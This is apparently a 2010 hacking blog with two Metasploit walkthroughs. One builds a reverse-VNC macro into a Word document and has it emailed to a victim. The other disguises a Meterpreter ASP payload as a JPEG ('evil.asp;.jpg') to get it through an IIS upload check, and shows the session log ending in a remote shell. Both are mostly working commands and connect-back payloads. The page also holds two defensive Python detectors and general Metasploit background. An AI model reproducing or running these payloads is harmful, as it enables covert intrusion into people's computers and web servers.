Unofficial blog

Tuesday, January 5, 2010

Metasploit: Reverse VNC hidden in a Word file

Today I will show you how to use the Metasploit payload feature to get a reverse VNC connection that can be hidden in a Word file, giving you the VNC desktop of the remote user.

Metasploit will create a macro for Word. Once the macro is embedded and a user opens the Word file containing it, we get a reverse VNC session to the target system; even antivirus can't detect it.

VNC does not need to be installed on the victim PC.
You can also do this over the WAN; the only requirement is that you forward port 4444 on your modem or router.

Let's begin

1) Create a macro to integrate with Word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) Copy the punter.bas file to Windows. In Office 2003 go to Tools -> Macro -> Visual Basic Editor,
then File -> Import File, choose punter.bas and save the document under a name such as macrogame.doc.
Now send this file to the victim via mail or some other technique; for this demo I will open it on my own system.

3) Now in BackTrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target opens the file on Windows, they will be asked whether to accept or not run the macro. If they accept, the connection will be initiated and the VNC client will open on the BackTrack host.
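As an added defensive counterpart to the walkthrough above (not code from the post or from Metasploit), a small Python check over constructed Sysmon-style events: the vncinject payload runs inside WINWORD.EXE, so the observable is Word itself dialling out (here to the post's LHOST on the default port 4444) or Word spawning a child process. The field names follow Sysmon Event ID 1 and 3, and the port allowlist is an assumption to tune per environment.

```python
"""Flag Office processes that connect outbound or spawn children.

Added defensive example for the macro walkthrough above, not Metasploit code.
The events are constructed and use Sysmon field names for Event ID 1 (process
create) and Event ID 3 (network connection); the port allowlist is an assumption."""
from typing import Dict, Iterable, List, Optional

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Ports Word is expected to talk to (file shares, HTTP/S); anything else is odd.
ALLOWED_OFFICE_PORTS = {80, 443, 445}

# Constructed sample events. The first mirrors the post: the vncinject payload
# runs inside WINWORD.EXE, so Word itself dials LHOST on the default port 4444.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE",
     "Initiated": True, "DestinationIp": "192.168.147.128", "DestinationPort": 4444},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE",
     "Initiated": True, "DestinationIp": "10.0.0.5", "DestinationPort": 445},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE"},
    {"EventID": 3, "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Initiated": True, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious(event: Dict) -> Optional[str]:
    """Return a finding for an event worth alerting on, else None."""
    eid = event.get("EventID")
    if eid == 3 and event.get("Initiated") and image_name(event["Image"]) in OFFICE_IMAGES:
        port = event["DestinationPort"]
        if port not in ALLOWED_OFFICE_PORTS:
            return f"office outbound {event['DestinationIp']}:{port}"
    if eid == 1 and image_name(event.get("ParentImage", "")) in OFFICE_IMAGES:
        return f"office spawned {image_name(event['Image'])}"
    return None


def scan(events: Iterable[Dict]) -> List[str]:
    """Run every event through suspicious() and keep the findings."""
    return [finding for finding in map(suspicious, events) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```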

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

Monday, January 4, 2010

Exploiting Microsoft IIS with Metasploit

First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:

$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp

Now we need to configure msfconsole to accept the incoming connection:

$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

To avoid the image content validator, we will prepend a valid JPG image to our ASP script:

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"

Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:

[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2668 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami

nt authority\network service
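As an added defensive example (not code from the post, from Metasploit or from IIS), the following Python contrasts the naive upload check the walkthrough defeats with a hardened one; the JFIF header, the ASP stub and the filename grammar are constructed assumptions.

```python
"""Upload validation: the naive check the post bypasses, beside a hardened one.

Added defensive example, not Metasploit or IIS code. naive_accepts() mirrors the
vulnerable application (name ends in "jpg", bytes start with a JPEG header), so
the cat-built "evil.asp;.jpg" passes. hardened_accepts() rejects names with ';'
(IIS 6 treats it as the end of the name and runs the .asp handler), allows one
allowlisted extension, and refuses image data that carries ASP markers."""
import re
import secrets

JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED_EXT = {"jpg", "jpeg"}
# Classic ASP code blocks and server-side script tags inside an "image".
# A genuine JPEG can contain "<%" by chance; re-encoding uploads through an
# image library is the stronger fix, this marker scan is the cheap one.
SCRIPT_MARKERS = (b"<%", b'runat="server"', b"runat='server'")
# One base name, one dot, one short extension: ';', NUL and extra dots all fail.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

# Constructed samples: a JPEG-looking header with an ASP stub appended (the
# shape "cat happy.jpg evil.asp" produces) and a plain image.
JFIF_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x02\x00" + b"\x00" * 16
POLYGLOT = JFIF_HEADER + b'<% Response.Write("constructed") %>'
CLEAN_JPEG = JFIF_HEADER + b"\x00" * 32 + b"\xff\xd9"


def naive_accepts(filename: str, data: bytes) -> bool:
    """The check the post defeats: suffix plus magic bytes only."""
    return filename.lower().endswith("jpg") and data.startswith(JPEG_MAGIC)


def hardened_accepts(filename: str, data: bytes) -> bool:
    """Strict name grammar, allowlisted extension, magic bytes, no script markers."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path part
    match = SAFE_NAME.fullmatch(name)
    if not match or match.group(1).lower() not in ALLOWED_EXT:
        return False
    if not data.startswith(JPEG_MAGIC):
        return False
    return not any(marker in data for marker in SCRIPT_MARKERS)


def storage_name(extension: str = "jpg") -> str:
    """Server-chosen name: the client's filename never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{extension}"


if __name__ == "__main__":
    print("naive    evil.asp;.jpg ->", naive_accepts("evil.asp;.jpg", POLYGLOT))
    print("hardened evil.asp;.jpg ->", hardened_accepts("evil.asp;.jpg", POLYGLOT))
    print("hardened evil.jpg      ->", hardened_accepts("evil.jpg", POLYGLOT))
    print("hardened happy.jpg     ->", hardened_accepts("happy.jpg", CLEAN_JPEG))
```

Storing the file under storage_name() in a directory with script execution disabled closes the hole even if a validation check is later weakened.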

Metasploit Blog

Metasploit? What is it?

What is it?
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
What does it do?
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.

Metasploit 3.3 Released

Version 3.3.3 of the Metasploit Framework has been released, featuring exploit safety rankings, a smaller EXE template, the addition of the InitialAutoRunScript option for Meterpreter, and the ability to run a script or command on all open sessions (sessions -c/-s). The complete release notes are online and version 3.3.3 can be obtained from this download page.

The Metasploit Framework

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task. Metasploit is written in the Ruby scripting language and is provided under the BSD license. More information about the framework can be found on the Framework site.

The latest downloads for the Metasploit Framework can be found on the Downloads page.

The development source of the Metasploit Framework can be retrieved from Subversion with the following command:

$ svn co https://www.metasploit.com/svn/framework3/trunk/

Please see the Installation and Updating pages for help installing the framework.

New users may be interested in the Feature Guide

The Wiki index may be a good starting point

Metasploit - msvidctl_mpeg2

msvidctl_mpeg2 from 4xteam on Vimeo.

Hacking Malware [Video Tut]

http://good.net/dl/bd/defcon-14-video/Defcon14-V12-Valsmith_and_Quist-Hacking_Malware.mp4/info
